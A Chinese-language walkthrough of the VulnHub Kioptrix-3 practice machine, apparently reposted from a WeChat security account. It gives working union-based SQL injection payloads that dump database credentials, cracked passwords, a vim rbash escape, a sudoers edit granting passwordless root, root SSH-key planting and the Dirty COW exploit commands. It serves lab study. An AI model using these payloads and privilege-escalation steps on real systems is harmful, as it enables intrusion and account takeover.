vulnhub靶场【kioptrix-3】靶机

admin 2025年1月27日00:42:25评论5 views字数 4243阅读14分8秒阅读模式

前言

靶机:kioptrix-3,IP地址为192.168.1.74

攻击:kali,IP地址为192.168.1.16

都采用虚拟机,网卡为桥接模式

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者在本公众号回复 kioptrix 获取下载链接

在这里解压靶机后,会有一个readme.txt文件,查看该文件,提示是需要进行ip和域名的绑定

kali中修改/etc/hosts文件即可,在windows中修改C:WindowsSystem32Driversetchosts文件即可

这里是修改windows文件,因为前面都是修改的kali文件,不能把windows也忘了

vulnhub靶场【kioptrix-3】靶机

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

vulnhub靶场【kioptrix-3】靶机

信息收集

使用nmap扫描端口

nmap -sV -O 192.168.1.74 -p- -T4
vulnhub靶场【kioptrix-3】靶机

网站信息探测

访问80端口界面,发现三个功能点,home指向index.php?page=bloglogin指向index.php?system=

vulnhub靶场【kioptrix-3】靶机

查看页面源代码后,发现脚本语言为php,并且是目录型网站,且发现几个地址链接

vulnhub靶场【kioptrix-3】靶机

访问blog,这就是一个博客

vulnhub靶场【kioptrix-3】靶机

访问login,发现是登录界面,尝试之前的万能密码进行测试,发现是不行的,不过这里还是可以看到产品的出处,也就是cmslotusCMS

vulnhub靶场【kioptrix-3】靶机

那么暂且搁置,还有一个目录没有访问查看呢

访问gallery,这个界面的内容挺多

vulnhub靶场【kioptrix-3】靶机

尝试进行测试吧,发现点击ligoat press room时,其中的功能多了很多,并且出现php传参id,这个可以进行模糊测试,先以最简单的测试,看有无注入点

vulnhub靶场【kioptrix-3】靶机

sql注入获取账户密码

尝试以sql注入的判断,以'进行闭合,发现出现报错,那么可能存在sql注入,并且数据库类型为mysql

vulnhub靶场【kioptrix-3】靶机

进一步测试,确定为数字型的注入

?id=1 or 1=1--+
?id=1 and 1=1--+
?id=1 and 1=2--+

尝试构造语句,先测试联合查询是否可行,毕竟这个是比较省事的。

首先确定显示列数,可以借助order by

?id=1 order by 6

这里的数字6是经过回显不同确定的

vulnhub靶场【kioptrix-3】靶机

确定列数为6,那么就构造联合查询

?id=-1 union select 1,2,3,4,5,6 --+

//对于靶机来说,数字1-6代表是可以,不过大部分时候,就算真的存在sql注入,也是并非这样
//而是需要对应类型,所以大部分时候,也是以null进行代表,然后猜测每一个类型是字符还是数字
?id=-1 union select 1,null,null,null,null,null --+

可以看到,在2,3位是有回显的

vulnhub靶场【kioptrix-3】靶机

尝试构造语句,来获取当前数据库名称,数据库用户,数据库版本信息

?id=-1 union select 1,concat(database(),'|',version(),'|',user()),3,4,5,6 --+

获取到信息,数据库gallery,数据库版本是5.0之后,具有information_schema这个表,并且确定concat是可用的

vulnhub靶场【kioptrix-3】靶机

那么尝试从information_schema中查询gallery中的一些数据,因为一般可能当前使用的数据库中有信息,当然肯定还是其他数据库也是有信息的,不过这里先测试这个

?id=-1 union select 1,concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--+
vulnhub靶场【kioptrix-3】靶机

发现这个表,那么就测试这个表中的元组

?id=-1 union select 1,concat(column_name),3,4,5,6 from information_schema.columns where table_name='gallarific_users'--+
vulnhub靶场【kioptrix-3】靶机

这两个就很是吸引人了,直接就尝试获取

?id=-1 union select 1,concat(username,'|',password),3,4,5,6 from gallarific_users--+
vulnhub靶场【kioptrix-3】靶机

用户名admin和密码n0t7t1k4

结合前面login目录,推测应该可以登录,访问login,并进行测试,不过并非,那么可能漏了数据,返回继续收集

在前面某处有一个表名是dev_accounts,不过当时没关注,其中accounts是账户的意思,结合dev,推测是靶机内的账户

vulnhub靶场【kioptrix-3】靶机
?id=-1 union select 1,concat(column_name),3,4,5,6 from information_schema.columns where table_name='dev_accounts'--+
vulnhub靶场【kioptrix-3】靶机
?id=-1 union select 1,concat(username,'|',password),3,4,5,6 from dev_accounts--+
vulnhub靶场【kioptrix-3】靶机
用户名
密码(md5加密)
解密密码
dreg
0d3eccfb887aabd50f243b3f155c0f85
Mast3r
loneferret
5badcaf789d3d1d09794d8f021f40f0e
starwars

可以发现这里的密码应该是进行加密,并且挺像md5加密的,假设就是,尝试进行破解即可,可借助john爆破,或者使用在线网站识别

vulnhub靶场【kioptrix-3】靶机

rbash逃逸

那么直接测试是否可连接ssh,发现可以登录

vulnhub靶场【kioptrix-3】靶机

尝试cd,发现具有rbash,没办法有更完整的功能

vulnhub靶场【kioptrix-3】靶机

输入help,发现有compgen命令可用

vulnhub靶场【kioptrix-3】靶机

常见的rbash逃逸方法有很多,这里通过compgen测试有无vim

compgen -c | grep vim
vulnhub靶场【kioptrix-3】靶机

那么随便vim编辑一个文件,然后尝试进行rbash逃逸

vim 1

按着esc,然后输入 :
:set shell=/bin/bash
:shell

即可逃逸成功

vulnhub靶场【kioptrix-3】靶机

还有其他方式,如最简单的,若是可以使用bash,则可以直接逃逸

vulnhub靶场【kioptrix-3】靶机

可自行ai搜索,或者参考一些博主的文章

提权

借助sudo提权

使用find寻找具有SUID权限的文件,发现sudo,尝试列出有无文件可用,但是发现当前用户不行

find / -perm -u=s -type f 2>/dev/null
vulnhub靶场【kioptrix-3】靶机

那么切换到用户loneferret,直接通过su切换即可,既然是新用户,查看当前目录下的一些文件,发现都指向ht

vulnhub靶场【kioptrix-3】靶机

测试sudo -l,发现虽然有一个文件,说是对于除su以外的都可以执行,但是测试后,根本不行

vulnhub靶场【kioptrix-3】靶机

那么还是从ht下手,直接sudo,发现报错

vulnhub靶场【kioptrix-3】靶机

可以自行ai搜索是什么意思,这里可以设置临时变量

export TERM=xterm
sudo /usr/local/bin/ht

或者

sudo TERM=xterm ht

这就是打开后的界面

vulnhub靶场【kioptrix-3】靶机

这里的操作方式,可以通过alt+f打开左上角的file菜单,其余的同样,都是alt+红色开头字母,可与打开对应的菜单,按esc退出菜单

这里因为这个ht是通过sudo打开的,所以可以通过这个打开一些无法打开的文件,如/etc/shadow

打开file菜单后,选择open,然后按着tab键盘,这时候就会切换到files,这里可以切换目录

vulnhub靶场【kioptrix-3】靶机

这里就可以尝试使用john进行爆破,不过这里肯定耗时间,毕竟还不知道加密方式

并且,这里还是可以修改的,所以还可以修改sudoers文件

打开后,添加一行,因为涉及到修改,所以需要保存,在alt+f后,有save按钮,然后按f10即可退出

loneferret ALL=(ALL) NOPASSWD:ALL
#对于loneferret用户,可以通过sudo执行所有,并且不需要输入密码
vulnhub靶场【kioptrix-3】靶机

再次sudo -l查看,可以发现修改成功,这时候就可以使用sudo为所欲为了

vulnhub靶场【kioptrix-3】靶机

这里还可以在kali生成公私钥,然后去/root目录下,在.ssh目录下,添加一个文件,然后把生成的公钥复制到新文件authorized_keys即可,这里是确认在/root下有.ssh目录的

vulnhub靶场【kioptrix-3】靶机

通过系统内核提权

在靶机测试内核版本等信息

uname -a
uname -r 
cat /etc/*release
cat /etc/issue
vulnhub靶场【kioptrix-3】靶机

这个内核范围是在脏牛提权的范围内的,只是对于使用哪一个有待测试

vulnhub靶场【kioptrix-3】靶机

测试过后,发现对于40839.c是可以的,当然这里还可以借助脚本工具les.sh或者叫linux-exploit-suggester.sh

这里在github的地址如下:

https://github.com/The-Z-Labs/linux-exploit-suggester

这是在kali中指定靶机的uname -a信息分析出最有可能的提权漏洞,也就是脏牛,并且这里还缩小范围了

vulnhub靶场【kioptrix-3】靶机

提权过程就是把40839.c文件下载到靶机内的/tmp目录,然后进行编译,可以查看该文件,其中是有用法的

gcc -pthread 40839.c -o dirty -lcrypt
./dirty my-new-password
su firefart
vulnhub靶场【kioptrix-3】靶机

编译后执行,然后切换到用户firefart,密码就是自己设置的,即可提权

vulnhub靶场【kioptrix-3】靶机

总结

该靶机考察以下几点:

  1. 网站功能测试,能点的都点了进行测试,最好是抓包分析,这里可通过浏览器抓包或者burp抓包都行,这里的靶机肉眼可见,就无需抓包
  2. 对于注入点能否找到并且测试,现在其实都放置在一个字典中,然后进行模糊测试某一个传参等方式
  3. 基本的sql注入要会,这里虽然我只用了联合查询,但是其他方式难道不行吗,比如延时注入、布尔注入
  4. 对于mysql数据库的基本构造要知道,这里是information_schema数据库的重点,当然其他数据库也要去了解
  5. 对于rbash逃逸,方法众多,不要局限,这里最终无法逃逸,还是可以切换用户的,这个主要就是练习
  6. 对于提权方法,这里是通过命令历史查看或者sudo -l都是可以发现第三方软件,并且初步测试该软件的功能,要快速知道该软件有无可利用点
  7. 提权方式,内核版本也是重要的,这里脏牛提权

这里其实前面有很多步骤都没有写,因为我是测试过,当时觉得并无内容,不重要,但是还是在这里写一下吧,毕竟要养成一个习惯

  1. 目录扫描爆破,这里其实发现了phpmyadmin界面,可以在这里进行爆破测试。主要就是不要忘记目录爆破,这个可能会取得意想不到的内容

  2. CMS漏洞,这里不要忘记搜索并测试,这种很重要,不过这里我是搜索并测试无用后,所以就没有记录。但是一定要知道这个重要的方式

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场【kioptrix-3】靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月27日00:42:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场【kioptrix-3】靶机http://cn-sec.com/archives/3673407.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息